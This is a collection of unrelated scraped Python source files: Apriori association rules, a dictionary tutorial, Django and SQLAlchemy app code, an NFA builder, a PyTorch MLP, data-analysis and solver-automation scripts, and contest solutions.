self.all_frequent_itemsets.update(frequent_itemsets)\n previous_frequent_itemsets = frequent_itemsets\n else:\n break\n return self\n\n\n def generate_all_rules(self):\n self.all_rules = dict()\n\n if not self.all_frequent_itemsets:\n self.generate_all_frequent_itemsets()\n\n for frequent_itemset, support in self.all_frequent_itemsets.items():\n if len(frequent_itemset) <= 1:\n continue\n \n self._generate_rules(itemset=frequent_itemset)\n return self\n \n \n def _calculate_support(self, itemset):\n itemset_cloned = frozenset(itemset)\n support = 0.0\n for event in self.dataset:\n if itemset_cloned.issubset(frozenset(event)):\n support += 1\n return support/self.n\n\n \n @staticmethod\n def _generate_candidate_itemsets(itemsets):\n candidate_itemsets = list()\n for i, itemset in enumerate(itemsets[:-1]):\n for itemset2 in itemsets[i+1:]:\n itemset_cloned = list(deepcopy(itemset))\n itemset_cloned.sort()\n itemset2_cloned = list(deepcopy(itemset2))\n itemset2_cloned.sort()\n if itemset_cloned[:-1] == itemset2_cloned[:-1]:\n candidate_itemset = set().union(itemset_cloned, itemset2_cloned)\n candidate_itemsets.append(frozenset(candidate_itemset))\n return candidate_itemsets\n\n\n def _generate_frequent_single_itemsets(self):\n single_itemsets = set()\n for event in self.dataset:\n for item in event:\n single_itemsets.add(frozenset([item]))\n frequent_single_itemsets = self._prune_frequent_itemsets(single_itemsets)\n return frequent_single_itemsets\n\n\n def _generate_rules(self, itemset, previous_consequents=None):\n if previous_consequents:\n consequents = self._generate_candidate_itemsets(previous_consequents)\n else:\n consequents = list(deepcopy(itemset))\n\n if consequents and len(itemset) == len(consequents[0]):\n return\n\n for consequent in deepcopy(consequents):\n antecedent = itemset.difference(frozenset([consequent]))\n confident = self.all_frequent_itemsets[frozenset(itemset)] / self.all_frequent_itemsets[frozenset(antecedent)]\n if confident >= self.minconf:\n lift = confident / self.all_frequent_itemsets[frozenset([consequent])]\n self.all_rules[(frozenset(antecedent), frozenset([consequent]))] = {\n 'support': self.all_frequent_itemsets[frozenset(itemset)],\n 'confident': round(confident, 7),\n 'lift': round(lift, 7)\n }\n else:\n consequents.remove(consequent)\n \n if consequents and len(itemset) > len(consequents[0]) + 1:\n self._generate_rules(itemset, previous_consequents = consequents)\n \n\n def 
_prune_frequent_itemsets(self, itemsets):\n        frequent_itemsets = dict()\n        for itemset in itemsets:\n            itemset_cloned = frozenset(itemset)\n            support = self._calculate_support(itemset_cloned)\n            if support >= self.minsup:\n                frequent_itemsets[itemset_cloned] = round(support, 7)\n        return frequent_itemsets","sub_path":"ml_projects/apriori_algorithm.py","file_name":"apriori_algorithm.py","file_ext":"py","file_size_in_byte":5848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"419422242","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n\n#dictionaries\nfeature = {'color':'red','points':100}\nprint(feature['color'])\nprint(feature['points'])\n\n#adding key-value pairs; a dictionary is a dynamic structure, so key-value pairs can be added at any time\nfeature = {'color':'red','points':100}\nprint(feature)\nfeature['height']=175\nfeature['weight']=150\nprint(feature)\n\n#modifying\nfeature = {'color':'red','points':100}\nfeature['color']='green'\nprint(feature)\n\n#deleting\nfeature = {'color':'red','points':100}\ndel feature['points']\nprint(feature)\n\n#a dictionary made of similar objects\nfavourite_languages={\n    'python':'python',\n    'go':'go',\n    'c':'c',\n}\nprint(favourite_languages['c'].title())\n\n#iterating over a dictionary\nfavourite_languages={\n    'python':'python',\n    'go':'go',\n    'c':'c',\n}\nfor k,v in favourite_languages.items(): #items returns a list of key-value pairs\n    print(\"\\nkey: \" + k)\n    print(\"value: \" + v)\n\n#iterating over all keys in a dictionary\nfavourite_sports={\n    'basketball':'basketball',\n    'football':'football',\n    'badminton':'badminton',\n}\nfor k in favourite_sports.keys():\n    print(k.title())\n\nfor v in favourite_sports.values():\n    print(v)\n\nfavourite_colors={\n    'red':'red',\n    'green':'green',\n    'blue':'blue'\n    ,\n}\nkeys=['red','blue']\nfor color in favourite_colors.keys():\n    print(color.title())\n    if color in keys:\n        print( \"Hi ,\" + color.title() + \", your favourite_color is \" + favourite_colors[color].title())\n\n#iterating over all keys in a dictionary in sorted order#\nfavourite_colors={\n    'red':'red',\n    'green':'green',\n    'blue':'blue'\n    ,\n}\n\nfor color in sorted(favourite_colors.keys()):\n    print(color.title())\n\n#iterating over all values in a dictionary#\n#set: removes duplicate items#\nfavourite_colors={\n    'red':'red',\n    'green':'green',\n    'blue':'blue',\n    'visionguo':'red',\n}\n\nfor color in set(favourite_colors.values()):\n    print(color.title())\n\n#nesting\nvisionguo={'favourite_colors':'red','favourite_languages':'python','favourite_sports':'basketball'}\nvisionguo1={'favourite_colors':'green','favourite_languages':'go','favourite_sports':'football'}\nvisionguo2={'favourite_colors':'yellow','favourite_languages':'shell','favourite_sports':'badminton'}\n\nfavourites = [visionguo,visionguo1,visionguo2]\nfor favourite in favourites:\n    print(favourite)\n\nfavourites = []\nfor number in range(30):\n    visionguo={'favourite_colors':'red','favourite_languages':'python','favourite_sports':'football'}\n    favourites.append(visionguo)\nfor favourite in favourites[0:3]:\n    if favourite['favourite_colors']=='red':\n        favourite['favourite_colors'] = 'black'\n        favourite['favourite_languages'] ='c'\n        favourite['favourite_sports'] = 'badminton'\n    elif favourite['favourite_colors']=='black':\n        favourite['favourite_colors'] = 'white'\n        favourite['favourite_languages'] ='java'\n        favourite['favourite_sports'] = 'tennis'\nfor favourite in favourites[0:5]:\n    print(favourite)\nprint(str(len(favourites)))\n\n#storing lists in a dictionary\nvisionguo = {'favourite_color':'red','favourite_sports':['basketball','football']}\nfor favourite_sport in visionguo['favourite_sports']:\n    print(favourite_sport)\n\nfavourite_languages = {'vision':['python','go'],'allen':['java'],'tom':['c++','c','c#']}\nfor name,languages in 
favourite_languages.items():\n    print(\"\\n\" + name.title() + \"'s favourite language is:\")\n    for language in languages:\n        print(language.title())\n\n#storing dictionaries in a dictionary\nusers = {\n    'visionguo' : {\n        'xing': 'vision',\n        'ming': 'guo',\n        'location': 'xian',\n    },\n    'allensu' : {\n        'xing': 'allen',\n        'ming': 'su',\n        'location': 'beijing',\n},\n}\n\nfor username,user_info in users.items():\n    print(\"\\n\" + \"username: \" + username.title())\n    fullname = user_info['xing'] + \" \" + user_info['ming']\n    location = user_info['location']\n\n    print(\"\\tFullname : \" + fullname.title())\n    print(\"\\tLocation : \" + location.title())\n\n\n","sub_path":"base/dic.py","file_name":"dic.py","file_ext":"py","file_size_in_byte":3873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"260421414","text":"from sqlalchemy import Column, Integer, String, ForeignKey, BigInteger\nfrom sqlalchemy.orm import relationship\n\nfrom app.utils.base import base\n\n\nclass Post(base):\n    __tablename__ = 'posts'\n    id = Column(Integer, primary_key=True)\n    text = Column(String(1000))\n    user_id = Column(Integer, ForeignKey('users.id'))\n    user = relationship('User', back_populates='posts')\n    post_date = Column(BigInteger)\n    status_id = Column(Integer, ForeignKey('statuses.id'))\n    status = relationship('Status', back_populates='posts')\n    photos = relationship('PostPhoto', back_populates='post')\n    comments = relationship('Comment', back_populates='post')\n\n    @property\n    def serialize(self):\n        return {\n            'id': self.id,\n            'text': self.text,\n            'user': self.user.serialize,\n            'postDate': self.post_date,\n            'photos': self.serialize_photo,\n            'type': self.status.title,\n            'commentsCount': len(self.comments),\n            'lastComment': self.serialize_last_comment\n        }\n\n    @property\n    def serialize_photo(self):\n        return [photo.serialize for photo in self.photos]\n\n    @property\n    def serialize_last_comment(self):\n        if len(self.comments) > 0:\n            return sorted(self.comments, key=lambda c: c.comment_date, reverse=True)[0].serialize\n        else:\n            return {}\n","sub_path":"app/model/post.py","file_name":"post.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"263644139","text":"# -*- coding:utf-8 -*-\r\nfrom django.urls import reverse\r\nfrom django.http import HttpResponseRedirect\r\nfrom django.shortcuts import get_object_or_404, render\r\nfrom epflutils.decorators import cache_anonymous_user\r\n\r\nfrom channel import LIST_SPECIFIC_CHANNEL_ID, ID_SESAME_CHANNEL\r\nfrom channel.models import Channel\r\nfrom channel.views import get_working_channel\r\nfrom newsletter.models.newsletter_translation import NewsletterTranslation\r\nfrom translation.models import Translation\r\nfrom .forms import SearchForm\r\n\r\nNB_NEWS_BY_PAGE = 10\r\n\r\n\r\n# 15 min of cache\r\n@cache_anonymous_user(60*15)\r\ndef search(request, channel_name):\r\n    \"\"\" Search news with many filters \"\"\"\r\n\r\n    source = Channel.get_source_channel(channel_name, lang=request.LANGUAGE_CODE)\r\n    channel = Channel.get_channel(channel_name)\r\n    search_kwargs = {'lang': request.LANGUAGE_CODE}\r\n\r\n    if channel_name == \"sciences on tourne\":\r\n        channel_name = \"science! 
on tourne\"\r\n        return HttpResponseRedirect(reverse('search',\r\n                                            kwargs={'channel_name': channel_name, }))\r\n\r\n    if channel_name == \"all\":\r\n        is_searching_channel = False\r\n        search_kwargs['channels_to_exclude'] = LIST_SPECIFIC_CHANNEL_ID\r\n        search_kwargs['only_original'] = True\r\n    else:\r\n        is_searching_channel = True\r\n        search_kwargs['channels_to_exclude'] = ()\r\n        search_kwargs['only_original'] = False\r\n        search_kwargs['order_by'] = \"-order\"\r\n        search_kwargs['channels'] = (get_object_or_404(Channel, name__iexact=channel_name),)\r\n    \r\n    user_search = True\r\n    \r\n    if request.method == 'GET' and 'search' in request.GET:\r\n        search_form = SearchForm(channel, request.GET)\r\n\r\n        if search_form.is_valid():\r\n            search_kwargs['keywords'] = search_form.get_keywords()\r\n            search_kwargs['date_from'] = search_form.get_date_from()\r\n            search_kwargs['themes'] = search_form.cleaned_data['themes']\r\n            search_kwargs['faculties'] = search_form.cleaned_data['faculties']\r\n            search_kwargs['publics'] = search_form.cleaned_data['publics']\r\n            search_kwargs['categories'] = search_form.cleaned_data['categories']\r\n            search_kwargs['projects'] = search_form.cleaned_data['projects']\r\n    else:\r\n        search_form = SearchForm(channel)\r\n        user_search = False\r\n\r\n    if request.user.is_authenticated:\r\n        search_kwargs['select_news_direct_access_only'] = True\r\n\r\n    translations = Translation.objects \\\r\n        .search(**search_kwargs) \\\r\n        .select_related('news', 'news__visual', 'news__thumbnail', 'news__category', 'news__channel')\r\n    \r\n    display_empty_channel_msg = (translations.count() == 0) and user_search\r\n\r\n    if translations.count() <= NB_NEWS_BY_PAGE:\r\n        nb_news_find = translations.count()\r\n    else:\r\n        nb_news_find = None\r\n    \r\n    newsletter_translations = None\r\n    if channel:\r\n        newsletter_translations = NewsletterTranslation.objects.filter(\r\n            newsletter__channel__id=channel.id,\r\n            lang=request.LANGUAGE_CODE,\r\n            status=NewsletterTranslation.STATUS.published).order_by(\"-publish_date\")\r\n    \r\n    preview = (request.method == 'GET' and 'preview' in request.GET and request.GET['preview'])\r\n    \r\n    ## To open the news in a new page\r\n    is_webservice = False\r\n    if channel and channel.id == ID_SESAME_CHANNEL:\r\n        is_webservice = True    \r\n    \r\n    return render(\r\n        request,\r\n        'search.html',\r\n        {\r\n            'channel': channel,\r\n            'translations': translations,\r\n            'search_form': search_form,\r\n            'source': source,\r\n            'channel_name': channel_name,\r\n            'css': Channel.get_css(channel_name),\r\n            'working_channel': get_working_channel(request),\r\n            'is_searching_channel': is_searching_channel,\r\n            'is_webservice': is_webservice,\r\n            'preview': preview,\r\n            'nb_news_find': nb_news_find,\r\n            'NB_NEWS_BY_PAGE': NB_NEWS_BY_PAGE,\r\n            'newsletter_translations': newsletter_translations,\r\n            'display_empty_channel_msg': display_empty_channel_msg,\r\n        })\r\n","sub_path":"src/search/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"117585592","text":"# !/usr/bin/env python3\nfrom copy import copy\n\nstart_point = 1\n'''graph_list = list of links represented by (orig, dest, value)'''\ngraph_list = [(1, 2, \"a\"), \n              (2, 3, \"g\"), \n              (2, 4, \"c\"), \n              (2, 5, (\"SET\", \"F\", \"G\", \"H\")), \n              (4, 2, (\"NOT\", \"\"))]\n\ndef graph_list2dict(graph_list):\n    graph_dict = dict()\n\n    for item in graph_list:\n        orig = item[0]\n        dest = item[1]\n        value = item[2]\n\n        if orig in 
graph_dict:\n if value in graph_dict[orig]:\n raise Exception(\"Each 2 links from the same link shouldn't have the same value.\")\n '''\n\t\t\telse:\n for link_value in graph_dict[orig]:\n if dest == graph_dict[orig][link_value]:\n raise Exception(\"The orig-dest pair are duplicated.\")'''\n\n else:\n graph_dict[orig] = dict()\n \n graph_dict[orig][value] = dest\n \n return graph_dict\n \ngraph_dict = graph_list2dict(graph_list)\nprint(graph_dict)\n\nstring1 = \"ag\"\nstring2 = \"acxcxcxc\"\n\n\ndef char_pattern_list_match(value, c):\n '''Match a char with char pattern list \"value\". Called with pattern match'''\n head = value[0]\n # char pattern [\"NOT\", \"a\"] = [^a]\n if head == \"NOT\":\n if len(value) > 2:\n raise Exception(\"in char pattern NOT contains only 1 sub-pattern\")\n return not (value_match(value[1], c))\n \n # char pattern [\"SET\", \"a\", \"b\", ...] = [ab...]\n elif head == \"SET\":\n if len(value) == 1:\n raise Exception(\"in char pattern SET contains at least 1 sub-pattern\")\n for i in value[1:]:\n if value_match(i, c):\n return True\n return False\n \n elif head == \"RANGE\":\n if len(value) != 3 or not (isinstance(value[1], str) and isinstance(value[2], str)):\n raise Exception(\"in char pattern RANGE contains only 2 chars\")\n elif len(value[1]) > 1 or len(value[2]) > 1:\n raise Exception(\"in char pattern RANGE contains no string of which length > 1\")\n else:\n lower_bound = ord(value[1])\n upper_bound = ord(value[2])\n if lower_bound > upper_bound:\n raise Exception(\n \"in char pattern RANGE the lower_bound must not bigger than upper bound.\")\n\n if ord(c) >= lower_bound and ord(c) <= upper_bound:\n return True\n else:\n return False\n else:\n raise Exception(\"The head of a char pattern list is not acceptable.\")\n\ndef value_match(value, c):\n if isinstance(value, str):\n is_meta_character = (len(value) == 2 and value[1] == \"\\\\\")\n if len(value) > 1 and not is_meta_character:\n raise Exception(\"Can't compare a char with 2 or more chars.\")\n elif value == c:\n return True\n else:\n return False\n\n elif isinstance(value, tuple):\n return char_pattern_list_match(value, c)\n\n else:\n raise Exception(\"The argument called with match_value is not available.\") \n\nprint(value_match((\"SET\", (\"RANGE\", \"a\", \"g\")), \"k\"))\n\ndef transit_string_in_graph(graph_dict, start_point, string):\n status = start_point\n for c in string:\n for value in graph_dict[status]:\n if value_match(value, c):\n status = graph_dict[status][value]\n \n return status\n\nprint(transit_string_in_graph(graph_dict, start_point, string2))\n\n\ndef id_gen():\n id_num = 0\n while True:\n new_value = (yield id_num)\n if new_value != None:\n id_num = new_value\n else:\n id_num += 1\n\nreal_id_generator = id_gen()\n\nclass NFA():\n '''Definition of NFA graph'''\n def __init__(self):\n self.start = None\n self.end = []\n self.graph = [] # list of triary tuple\n \n def __repr__(self):\n return_string = \"\"\n return_string += \"Start: %d\\n\" % self.start\n \n if self.graph == []:\n return_string += \"EMPTY PATH\"\n\n else:\n for path in self.graph:\n path_string = \"%s -> %s : %s\\n\" % (path[0], path[1], path[2])\n return_string += path_string\n \n end_string = \"End: \" + str(self.end)\n return_string += end_string\n \n return return_string\n \ndef make_simple_nfa(pattern):\n nfa = NFA()\n nfa.start = next(real_id_generator)\n nfa.end.append(next(real_id_generator))\n\n nfa.graph.append(tuple([nfa.start, nfa.end[0], pattern]))\n\n return nfa\n\ndef nfa_concat(nfa1, nfa2):\n 
\"\"\"xy\"\"\"\n new_nfa = NFA()\n new_nfa.start = copy(nfa1.start)\n\n connecting_point_pair = [nfa1.end, nfa2.start]\n \n new_graph = copy(nfa1.graph)\n new_end = []\n for path in nfa2.graph:\n if path[0] == connecting_point_pair[1]:\n for n in connecting_point_pair[0]:\n new_graph.append(tuple([n] + list(path[1:3])))\n else:\n new_graph.append(path)\n \n for e in nfa2.end:\n if e == connecting_point_pair[1]:\n new_end += nfa1.end\n else:\n new_end.append(e)\n \n new_nfa.graph = new_graph\n new_nfa.end = new_end\n\n return new_nfa\n\ndef nfa_or(nfa1, nfa2):\n \"\"\"x|y\"\"\"\n new_nfa = NFA()\n new_nfa.start = copy(nfa1.start)\n\n new_end = copy(nfa1.end)\n \n new_graph = copy(nfa1.graph)\n\n for path in nfa2.graph:\n if path[0] == nfa2.start:\n appended_link = tuple([nfa1.start] + list(path[1:3]))\n new_graph.append(appended_link)\n else:\n new_graph.append(path)\n \n for e in nfa2.end:\n if e == nfa2.start:\n new_end.append(nfa1.start)\n else:\n new_end.append(e)\n \n new_nfa.graph = new_graph\n new_nfa.end = new_end\n\n return new_nfa\n\ndef nfa_once_or_none(nfa1, nfa2):\n \"\"\"\"xy?\"\"\"\n new_nfa = NFA()\n new_nfa.start = copy(nfa1.start)\n new_nfa.end = nfa1.end + nfa2.end\n\n new_graph = copy(nfa1.graph)\n for path in nfa2.graph:\n generated_links = []\n\n if path[0] == nfa2.start:\n for new_link_orig in nfa1.end:\n appended_link = tuple([new_link_orig] + list(path[1:]))\n generated_links.append(appended_link)\n else:\n generated_links = [path]\n\n new_graph += generated_links\n new_nfa.graph = new_graph\n\n return new_nfa\n\n\ndef nfa_repeat_or_none(nfa1, nfa2):\n \"\"\"xy*\"\"\"\n new_nfa = NFA()\n new_nfa.start = copy(nfa1.start)\n new_nfa.end = copy(nfa1.end)\n\n new_graph = copy(nfa1.graph)\n\n for path in nfa2.graph:\n temp_links = []\n\n if path[0] == nfa2.start:\n for new_link_orig in nfa1.end:\n appended_link = tuple([new_link_orig] + list(path[1:]))\n temp_links.append(appended_link)\n else:\n temp_links = [path]\n \n generated_new_links = []\n for link in temp_links:\n if link[1] in nfa2.end:\n for new_link_end in nfa1.end:\n appended_link = tuple([link[0]]+[new_link_end]+[link[2]])\n generated_new_links.append(appended_link)\n else:\n generated_new_links.append(link)\n\n new_graph += generated_new_links\n new_nfa.graph = new_graph\n \n return new_nfa\n\nnfa1 = make_simple_nfa(\"a\")\nnfa2 = make_simple_nfa((\"NOT\", \"b\"))\nnfa3 = nfa_or(nfa1, nfa2)\nprint(nfa3)\nprint(nfa_repeat_or_none(nfa1, nfa2))\nprint(nfa_once_or_none(nfa1, nfa2))","sub_path":"newFolder/nfa_graph.py","file_name":"nfa_graph.py","file_ext":"py","file_size_in_byte":7495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"222011587","text":"from importlib import reload\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.cluster.birch import Birch\nfrom sklearn.metrics import silhouette_score, davies_bouldin_score\nimport attributes as at\nimport plot_helper as ph\nimport pandas as pd\nimport os\n\n#\n# Subset of Attributes\n# \nattributes = at.attributes\ncolumns = [a['col'] for a in attributes]\nnames = [a['name'] for a in attributes]\n\nbase_path = '.'\ndf = pd.read_csv(f'{base_path}/data/deepsolar_tract.csv', index_col=0)\ndf = df[columns]\n\n#\n# NaN Count\n#\nnan_count = df.isnull().any(axis=1).sum()\nprint(nan_count)\nprint(len(df))\ndf.dropna(inplace=True)\nprint(len(df))\n\n#\n# Group By FIPS\n#\ndf = df.groupby(['state', 'fips']).mean().reset_index()\n\n#\n# Maps\n#\nmap_attributes = list(filter(lambda a: a['col'] in 
['solar_system_count', 'total_panel_area', 'frost_days'], attributes))\nfor ma in map_attributes:\n    col = ma['col']\n    name = ma['name']\n    map_df = df[['state', col]].groupby(['state']).sum().reset_index()\n    locations = list(map(str.upper, map_df['state']))\n    z = map_df[col]\n\n    ph.plot_us_map(\n        locations,\n        z,\n        'viridis',\n        name,\n        name + ' by State',\n        '/maps/' + col + '_by_state'\n    )\n\n# map_df = df[['fips', col]].groupby(['fips']).sum().reset_index()\n# fips = [int(str(f)[:-6]) for f in map_df['fips']]\n# values = map_df[col]\n\n# ph.plot_fips(\n#     fips,\n#     values,\n#     name,\n#     name + ' by State',\n#     '/maps/' + col + '_by_fips'\n# )\n\n#\n# Histograms\n#\nhist_attributes = list(filter(lambda a: a['col'] not in ['state', 'fips'], attributes))\nfor ha in hist_attributes:\n    col = ha['col']\n    name = ha['name']\n\n    ph.plot_hist(\n        df[[col]],\n        50,\n        col,\n        dict([(col, name)]),\n        '/hist/' + col\n    )\n\n#\n# Box Plots\n#\nbox_plots_attributes = list(filter(lambda a: a['col'] not in ['state', 'fips'], attributes))\nfor bp in box_plots_attributes:\n    col = bp['col']\n    name = bp['name']\n    ph.plot_box_plot(df[col], col, dict([(col, name)]), './box/' + col)\n\ndf.to_csv('data/data_to_cluster.csv')","sub_path":"data-analysis/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"513129261","text":"\"\"\"\nSimilar to PointNet, just mlp without dropout.\n\"\"\"\nimport torch.nn as nn\nimport torch.utils.data\nimport torch.nn.functional as F\nimport torch\nimport torch.nn.parallel\nfrom torch.autograd import Variable\nimport numpy as np\n\n__all__ = [\"MLP5_max\", \"MLP5_avg\"]\n\nclass MLP5(nn.Module):\n    def __init__(self, num_classes=40, use_normals=True, pool='max', **kwargs):\n        super(MLP5, self).__init__()\n        if use_normals:\n            channel = 6\n        else:\n            channel = 3\n        self.feat = nn.Sequential(\n            nn.Conv1d(channel, 64,1),\n            nn.BatchNorm1d(64),\n            nn.ReLU(inplace=True),\n            nn.Conv1d(64, 128,1),\n            nn.BatchNorm1d(128),\n            nn.ReLU(inplace=True),\n            nn.Conv1d(128, 1024,1),\n            nn.BatchNorm1d(1024)\n        )\n        self.pool = nn.AdaptiveMaxPool1d(1) if pool == \"max\" else nn.AdaptiveAvgPool1d(1)\n        self.fc1 = nn.Linear(1024, 512)\n        self.fc2 = nn.Linear(512, 256)\n        self.fc3 = nn.Linear(256, num_classes)\n        # self.dropout = nn.Dropout(p=0.4)\n        self.bn1 = nn.BatchNorm1d(512)\n        self.bn2 = nn.BatchNorm1d(256)\n\n\n    def forward(self, x):\n        x = self.feat(x)\n        x = self.pool(x).squeeze(dim=-1)\n        x = F.relu(self.bn1(self.fc1(x)), inplace=True)\n        x = F.relu(self.bn2(self.fc2(x)), inplace=True)\n        x = self.fc3(x)\n        return {\n            \"logits\":x\n        }\n\n\ndef MLP5_max(num_classes=40, **kwargs) -> MLP5:\n    return MLP5(num_classes=num_classes, pool=\"max\", **kwargs)\n\ndef MLP5_avg(num_classes=40, **kwargs) -> MLP5:\n    return MLP5(num_classes=num_classes, pool=\"avg\", **kwargs)\n\n\nif __name__ == '__main__':\n    print(\"===> testing pointNet with use_normals\")\n    data = torch.rand(10, 6, 1024)\n    model = MLP5_avg(num_classes=40, use_normals=True)\n    out = model(data)\n    print(f\"x shape is: {out['logits'].shape}\")\n","sub_path":"models/mlp5.py","file_name":"mlp5.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"211550426","text":"#Problem 1436: Movie Director Shom (영화감독 숌)\n#https://www.acmicpc.net/problem/1436\n\ncnt = int(input())\n\nnum = 666\nck = 1\n\nwhile True:\n\n    if ck == cnt:\n        print(num)\n        break\n    \n    num += 1\n\n    if 
str(num).find(\"666\") != -1:\n ck +=1\n\n\n\n\n \n","sub_path":"11_브루트포스/[05]1436번_영화감독숌.py","file_name":"[05]1436번_영화감독숌.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"35762359","text":"import os\nimport subprocess as sub\nimport re\n\ncurdir=os.getcwd()\ncurdir=curdir.strip('automatic')\nnewdir=curdir+'inputdata'\nos.chdir(newdir)#enter data directory\nwith open('input.txt','r') as f:\n count=len(f.readlines())\n f.seek(0)\n for i in range(1,count+1):\n line=f.readline()\n find_1=bool(re.match('[\\s]*casetype',line))\n find_2=bool(re.match('[\\s]*num_p_pre',line))\n find_3=bool(re.match('[\\s]*num_p_solve',line))\n find_4=bool(re.match('[\\s]*inputpath',line))\n find_5=bool(re.match('[\\s]*meshtype',line))\n find_6=bool(re.match('[\\s]*internalfield',line))\n find_7=bool(re.match('[\\s]*mediumtype',line))\n find_8=bool(re.match('[\\s]*quadtype',line))\n find_9=bool(re.match('[\\s]*spacescheme',line))\n find_10=bool(re.match('[\\s]*wall_temperature',line))\n find_11=bool(re.match('[\\s]*wall_emissivity',line))\n find_12=bool(re.match('[\\s]*num_p_dir',line))\n find_13=bool(re.match('[\\s]*n_axis',line))\n if find_1 == True:\n casetype=line.lstrip()\n casetype=casetype.replace('casetype = ','')\n casetype=casetype.rstrip()\n if find_2 == True:\n num_pre=line.lstrip()\n num_pre=num_pre.replace('num_p_pre = ','')\n num_pre=num_pre.rstrip()\n if find_3 == True:\n num_solve=line.lstrip()\n num_solve=num_solve.replace('num_p_solve = ','')\n num_solve=num_solve.rstrip()\n if find_4 == True:\n inputpath=line.lstrip()\n inputpath=inputpath.replace('inputpath = ','')\n inputpath=inputpath.rstrip()\n if find_5 == True:\n meshtype=line.lstrip()\n meshtype=meshtype.replace('meshtype = ','')\n meshtype=meshtype.rstrip()\n if find_6 == True:\n internalfield=line.lstrip()\n internalfield=internalfield.replace('internalfield = ','')\n internalfield=internalfield.rstrip()\n if find_7 == True:\n mediumtype=line.lstrip()\n mediumtype=mediumtype.replace('mediumtype = ','')\n mediumtype=mediumtype.rstrip()\n if find_8 == True:\n quadtype=line.lstrip()\n quadtype=quadtype.replace('quadtype = ','')\n quadtype=quadtype.rstrip()\n if find_9 == True:\n spacescheme=line.lstrip()\n spacescheme=spacescheme.replace('spacescheme = ','')\n spacescheme=spacescheme.rstrip()\n if find_10 == True:\n wall_temperature=line.lstrip()\n wall_temperature=wall_temperature.replace('wall_temperature = ','')\n wall_temperature=wall_temperature.rstrip()\n if find_11 == True:\n wall_emissivity=line.lstrip()\n wall_emissivity=wall_emissivity.replace('wall_emissivity = ','')\n wall_emissivity=wall_emissivity.rstrip()\n if find_12 == True:\n num_p_dir=line.lstrip()\n num_p_dir=num_p_dir.replace('num_p_dir = ','')\n num_p_dir=num_p_dir.rstrip()\n if find_13 == True:\n n_axis=line.lstrip()\n n_axis=n_axis.replace('n_axis = ','')\n n_axis=n_axis.rstrip()\n\nwith open('input_2.txt','w') as c:\n print('#inputpath',file=c)\n print(inputpath,file=c)\n print('#meshtype',file=c)\n print(meshtype,file=c)\n print('#casetype',file=c)\n print(casetype,file=c)\n print('#internalfield',file=c)\n print(internalfield,file=c)\n print('#mediumtype',file=c)\n print(mediumtype,file=c)\n print('#quadtype',file=c)\n print(quadtype,file=c)\n print('#spacescheme',file=c)\n print(spacescheme,file=c)\n print('#wall_temperature',file=c)\n print(wall_temperature,file=c)\n print('#wall_emissivity',file=c)\n print(wall_emissivity,file=c)\n print('#num_p_dir',file=c)\n 
print(num_p_dir,file=c)\n print('#n_axis',file=c)\n print(n_axis,file=c)\n\nif casetype == 'benchmark':#if the case is a benchmark,just trim the primitive .msh file\n newdir=curdir+'convert_msh'\n os.chdir(newdir)#change directory to convert_msh\n job=sub.call('./launch',shell=True)\nelif casetype == 'real':#if the case is a real case with .dat file, convert it to the modified .msh file\n newdir=curdir+'dat_2_msh'\n os.chdir(newdir)#change directory to new_pre\n job=sub.call('./launch',shell=True)\n\nnewdir=curdir+'preprocessing'\nos.chdir(newdir)#enter preprocessing directory\njob=sub.call('./launch',shell=True)\njob=sub.call('./pre',shell=True)\nnewdir=curdir+'solver'\nos.chdir(newdir)#enter solver directory\njob=sub.call('./launch',shell=True)\njob=sub.call('mpirun -np '+num_solve+ ' ./solve',shell=True)\nnewdir=curdir+'postprocessing'#enter postprocessing directory\nos.chdir(newdir)\njob=sub.call('./launch',shell=True)","sub_path":"automatic.py","file_name":"automatic.py","file_ext":"py","file_size_in_byte":4776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"500458064","text":"alph = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\n\nT = int(input())\nfor tc in range(1, T+1):\n\tN, L = [int(a) for a in input().split()]\n\tc = [int(a) for a in input().split()]\n\tpp3 = [c[n]*c[n+2]/c[n+1] for n in range(L-2)]\n\tminn, minpp3 = min(enumerate(pp3), key=lambda x: x[1])\n\tp = [None]*(L+1)\n\ti=2\n\twhile i*i <= minpp3:\n\t\tif(minpp3%i == 0):\n\t\t\tpf1 = i\n\t\t\tpf2 = int(minpp3//i)\n\t\t\tbreak\n\t\ti+=1\n\ttry:\n\t\tp[minn+3] = pf1\n\t\tp[minn] = pf2\n\t\tfor i in range(minn, 0, -1):\n\t\t\tif c[i-1]/p[i] != c[i-1]//p[i]: raise \"\"\n\t\t\tp[i-1] = c[i-1]//p[i]\n\t\tfor i in range(minn, len(p)-1):\n\t\t\tif c[i]/p[i] != c[i]//p[i]: raise \"\"\n\t\t\tp[i+1] = c[i]//p[i]\n\t\tsp = sorted(set(p))\n\t\tk = dict(zip(sp, alph))\n\t\tprint(\"Case #{}: {}\".format(tc, ''.join([k[a] for a in p])))\n\texcept:\n\t\tp[minn+3] = pf2\n\t\tp[minn] = pf1\n\t\tfor i in range(minn, 0, -1):\n\t\t\tp[i-1] = c[i-1]//p[i]\n\t\tfor i in range(minn, len(p)-1):\n\t\t\tp[i+1] = c[i]//p[i]\n\t\tsp = sorted(set(p))\n\t\tk = dict(zip(sp, alph))\n\t\tprint(\"Case #{}: {}\".format(tc, ''.join([k[a] for a in p])))","sub_path":"code jam 